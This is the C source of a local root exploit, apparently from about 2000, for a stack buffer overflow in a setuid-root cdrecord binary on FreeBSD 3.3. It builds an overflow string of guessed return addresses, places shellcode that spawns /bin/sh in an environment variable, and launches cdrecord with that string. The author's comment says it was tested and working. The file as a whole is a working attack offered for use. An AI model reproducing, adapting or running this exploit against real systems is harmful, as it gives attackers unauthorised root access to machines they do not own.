/*
 freebsd cdrecord exploit by SectorX of XOR [http://xorteam.cjb.net]
 
 cdrecord seems to be suid root on many different systems, some by default
 and some with purpose. which is why I used a shellcode that spawns a
 shell. this exploit had been successfuly tested against FreeBSD 3.3-RELEASE
 with offset=600.
 
 Greets to XOR Team, to noir for discovering this overflow, and to mudge
           for writing this lovely shellcode.
 
				       --sectorx <sectorx@digitalphobia.com>
*/

#include <stdio.h>
#include <stdlib.h>

#define LENGTH 76
#define EGGIE 500

long esp()
{
  __asm__("movl %esp, %eax");
}
char devilspawn[];

int main(int argc, char *argv[])
{
  long addr;
  char buf[LENGTH];
  char egg[EGGIE];
  int i,offset;

  printf("cdrecord exploit by sectorx (FreeBSD)\n");
  if (argc < 2)
    {
      printf("error: offset must be supplied as a parameter\n");
      printf("*note* FreeBSD 3.3-RELEASE\'s offset is 600\n\n");
      return;
    }
  offset = atoi(argv[1]);
  addr = esp()+offset;
  printf("Using offset 0x%x [%d], eip = 0x%x\n",offset,offset,addr);
  /* build the overflow string */
  for (i=0;i<LENGTH;i+=4) *(long*)&buf[i] = addr;
  buf[LENGTH-1] = '\0';
  /* build the egg string */
  memset(&egg,0x90,sizeof(egg));
  memcpy(egg+(EGGIE-strlen(devilspawn)-1),devilspawn,strlen(devilspawn));
  egg[EGGIE-1] = '\0';

  setenv("EGG",egg,1);
  execl("/usr/local/bin/cdrecord","cdrecord-bin","dev=",buf,"/etc/fstab",0);
}

char devilspawn[]=
  "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
  "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
  "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
  "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
/*                    www.hack.co.za           [12 June 2000]*/